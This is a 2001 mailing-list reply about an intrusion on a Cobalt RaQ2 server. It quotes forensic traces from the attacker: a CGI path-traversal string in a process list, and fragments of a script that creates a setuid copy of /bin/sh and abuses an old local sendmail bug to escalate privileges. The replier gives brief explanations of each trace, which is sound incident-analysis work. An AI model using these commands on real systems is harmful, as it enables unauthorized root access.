[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Raq2 Hack



On Sun, 19 Aug 2001, Hacked Raq2 wrote:

> Hello all,
> 
> Well, it seems that I've had an intruder on my Raq2. What I'm trying to
> figure out, is how he got in. I have all the important patches applied and

> Here's the processes that were running. It appears he only had the
> privileges of HTTPD:
> 
> httpd    19108  0.0  0.6  3012   864  ?  S NAug 17   0:00 sh -c
> /home/sites/site19/cgi-bin/Mall/../../../../../../../../../../../../../../..
> /../../../../../../../../../

I'd place a bet on that one, looks typical of a exploit to compromise a
cgi with some quoting hole in it....

> I also see that he had some kind of IRC program running.

typical, gotta brag about the exploits to all the other clueless...
> 
> Here are the contents of the shell.pl that he had in /tmp:

Just opens a telnet port...

> Here are a list of the files he put into /tmp:
> 
> echo "[icesk] createing suid shellscript"
> echo <<EOF > /tmp/suid.sh
> #!/bin/sh
> cp /bin/sh /tmp/sh;chmod +s /tmp/sh

Hmm, this isn't supposed to work on raq2's anymore, one of the updates was
supposed to remove the stucky bit from /tmp

> ./sendmail 127.0.0.1 /tmp/suid.sh

Old bug in sendmail...makes it try to 'fix' owner/permissions on the
file...

> echo "[icesk] allow 10 minutes for mail to cycle then run /tmp/sh"

which maybe now has higher perms and g+s

gsh